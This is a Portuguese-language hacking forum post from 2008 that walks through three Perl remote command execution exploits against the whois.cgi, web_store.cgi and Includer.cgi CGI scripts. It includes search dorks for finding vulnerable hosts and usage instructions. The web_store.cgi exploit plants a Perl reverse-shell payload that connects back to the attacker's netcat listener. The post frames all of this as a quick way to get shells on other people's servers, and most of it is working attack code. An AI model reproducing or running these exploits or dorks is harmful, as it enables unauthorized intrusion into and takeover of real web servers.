Explorando Whois.cgi,web_store.cgi e Include.cgi

Started by C00L3R, 11 de December , 2008, 12:07:17 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

Print
Go Down Pages1
User actions

C00L3R

11 de December , 2008, 12:07:17 PM
Neste post vo estar mostrando como explorar alguns hosts com vulns em "CGI"
O que não é tão popular porem tem um ataque devastador podendo voltar com
a shell em segundos ou minutos...

Aqui vai um exploit simples de explorar e facil de compreender
Code Select
#!/usr/bin/perl
###############################################################
# whois.pl - Marco van Berkum - m.v.berkum@obit.nl #
# homepage: [url=http://ws.obit.nl]http://ws.obit.nl[/url] - exploits Fastgraf's whois.cgi #
# #
# DO NOT EDIT THIS HEADER, else the bedbugs will bite #
# Greets to sigmo for finding stupid POST examples #
# Also greetings to DUCKEL (YES YOU HAVE CREDIT NOW ;)) #
# #
# Use like this: #
# ./whois.pl http://www.ifyoureadthisyouaregay.com "ls -al" #
###############################################################

use IO::Socket;
$host = $ARGV[0]; $command = $ARGV[1]; $length = length($command) + 8;

$sock = new IO::Socket::INET (PeerAddr => $host, PeerPort => 80, Proto => 'tcp');
if($sock) {
print $sock "POST http://$host/cgi-bin/whois.cgi HTTP/1.0
User-Agent: Whois Meta Character Exploit Browser :P
Host: $host
Content-length: $length

host=%7c$command\n\n";
sleep(3); # change to lower or higher, depending on your connection
sysread($sock, $buffer, 100000);
($empty, $output) = split(/PRE/, $buffer);
$output =~ s/[\<\>\/]//g;
if($output) {
print("$output\n");
} else { print "No data, or not vulnerable\n";
}
}
close $sock;


# milw0rm.com [2001-01-12]
assim como muitos exploits em perl ele usa socket para se conectar na porta
80 e conectando na "URL" vulneravel, A "dork" para buscar hosts vulneraveis
é "allinurl:whois.cgi" achando o Host basta compilar o programa com a string
exemplo:
"./whois.pl http://www.site.com/cgi-bin/whois.cgi "ls -al" "
desta forma o exploit explora com sucesso a falha no proprio exploit tem um exemplo comentado na sua source...

Outro exploit remoto CGI:
Code Select
#!/usr/bin/perl -w
#
#********************************************************************************************
# Remote Command Execution Vulnerability In Web_store.cgi *
# *
# [SegmentationFault Group] *
# *
# *
# Greetz to : Xsupr3mo - failed - Status-x - Stealh - P3S4D3L0 *
# Greetz to : berhooz - nima - ehsan - Unknown OutLaw eutanasia *
# http://www.ashiyane.com *
# *
#********************************************************************************************
#ok setp by setp to work : * *
#[*] start exploit * If connect back shell not found: maybe :*
#[*] run in your system: nc -l -vv -p 2975 * you do not have perm to write in /tmp *
#[*] starting connect back on 127.0.0.1 :2975 * Shell not vulnerable *
#[*] DONE! * test and put in /$path/hints.pl?|cd /tmp*
#[*] Look netcat windows * other path that u know dont have perm *
# * *
#********************************************************************************************
#############################################################################################
use IO::Socket;

print "*****************************************************************\n";
print "\tRemote Command Execution Vulnerability in web_store.cgi\n ";
print "\t\t-=[ SegmentationFault Group ]=-\n";
print "\t\tcode writen by sun-os [ActionSpider]\n\n";
print "\tGerttz to : Xsupr3mo - failed - Status-x - Stealh";
print "\n\tand : Behrooz - nima - ehsan http://www.ashiyane.com\n";
print "*****************************************************************\n\n";


print "enter hostname or ip : \n";
chomp($server=<STDIN>);

print "port: (default: 80)\n";
chomp($port=<STDIN>);
$port=80 if ($port =~/\D/ );
$port=80 if ($port eq "" );

print "path: (???/web_store.cgi?)\n";
chomp($path=<STDIN>);

print "your ip (for reverse connect): \n";
chomp($ip=<STDIN>);

print "your port (for reverse connect): \n";
chomp($reverse=<STDIN>);

print "ok Remote Command Execution now Start";
print "|+| try to exploiting...\n";

$string="/$path/web_store.cgi?page=.html|cd /tmp;echo ".q{use Socket;$execute= 'echo "`uname -a`";echo "`id`";/bin/sh';$target=$ARGV[0];$port=$ARGV[1];$iaddr=inet_aton($target) || die("Error: $!\n");$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");$proto=getprotobyname('tcp');socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");connect(SOCKET, $paddr) || die("Error: $!\n");open(STDIN, ">&SOCKET");open(STDOUT, ">&SOCKET");open(STDERR, ">&SOCKET");system($execute);close(STDIN)}." >>dc.pl;perl dc.pl $ip $reverse|";

print "|+| OK! \n";
print "|+| NOW, run in your system: nc -l -vv -p $reverse\n";
print "|+| starting connect back on $ip :$reverse\n";
print "|+| DONE!\n";
print "|+| Look netcat windows\n\n";
$socket=IO::Socket::INET->new( PeerAddr => $server, PeerPort => $port, Proto => tcp)
or die;

print $socket "POST $path HTTP/1.1\n";
print $socket "Host: $server\n";
print $socket "Accept: */*\n";
print $socket "User-Agent: blackbox\n";
print $socket "Pragma: no-cache\n";
print $socket "Cache-Control: no-cache\n";
print $socket "Connection: close\n\n";

print "have nice shell...";

# milw0rm.com [2005-06-15]

É bacana este exploit facil compreender, meio antigo mas ainda é possivel ver Hosts vulneraveis a Dork aqui é "web_store.cgi" as variaveis são dadas depois da compilação então basta compilar e o exploit ja vai pedindo os dados para atribuir nas variaveis...
ex: $./exploit.pl ou $perl exploit.pl

Vamos ao Ultimo exemplo:
Code Select
#!/usr/bin/perl
#
# [K-C0d3r] Includer.cgi 1.0 remote command execution [K-C0d3r]
#
# C0d3d By K-C0d3r, a http://www.x0n3-h4ck.org friend!
#
# I think the bug was discovered by Francisco Alisson.
#
# Greetz to: mZ, CorryL, Expanders, SiNaPsE, off, rikky, milw0rm.
#
# F**K o*f to all RxBot kiddies as e*****t, G***n, d***b.
#
##########################################################################
# [kc@K-C0d3r xpl]$ perl KCincluder.pl 127.0.0.1 /cgi-bin/includer.cgi 1
# [K-C0d3r] Includer.cgi Remote Command Execution Exploit [K-C0d3r]
# [?] Insert command: id
# [+] Conecting to 127.0.0.1
# [+] Connected to 127.0.0.1
# [+] Injecting command ...
# uid=500(kc) gid=500(kc) gruppi=500(kc)
# [kc@K-C0d3r xpl]$
##########################################################################

use IO::Socket;

sub Usage {
print STDERR "Usage:\nKCinc-xpl.pl <www.victim.com> </path/to/includer.cgi> <exploitation_type>.\n";
print STDERR "Exploitation Types:\n \t\t1: includer.cgi?|command|\n \t\t2: includer.cgi?template=|command|\n\n";
exit;
}

if (@ARGV < 3)
{
Usage();
}


$host = @ARGV[0];
$path = @ARGV[1];
print "[K-C0d3r] Includer.cgi Remote Command Execution Exploit [K-C0d3r]\n";
print "[?] Insert command: ";
$command = <STDIN>;
$type = @ARGV[2];

if ($type > 2)
{
Usage();
}


print "[+] Conecting to $host\n";

if ($type = 1)
{
$injection = "$host$path?|$command|";
$socket = new IO::Socket::INET (PeerAddr => "$host",
PeerPort => 80,
Proto => 'tcp');
die unless $socket;
print "[+] Connected to $host\n";
print "[+] Injecting command ...\n";
print $socket "GET http://$injection HTTP/1.1\nHost: $host\n\n";
while (<$socket>)
{
print $_;
exit;
}
}

if ($type = 2)
{
$injection = "$host$path?template=|$command|";
$socket = new IO::Socket::INET (PeerAddr => "$host",
PeerPort => 80,
Proto => 'tcp');
die unless $socket;
print "[+] Connected to $host\n";
print "[+] Injecting command\n";
print $socket "GET http://$injection HTTP/1.1\nHost: $host\n\n";
while (<$socket>)
{
print $_;
exit;
}
}


Este Ultimo exploit é muito simples feito com socket e dois "IF" um para cada escolha
do usuario do programa ou seja escolher o tipo de exploração "Includer.cgi?" ou "includer.cgi?template=" um exemplo de uso o proprio exploit mostra para o usuario
quando executado...

Como diz presuntinho:
Bem é isttotoo é tudo pepepessoal  :D
Print
Go Up Pages1
User actions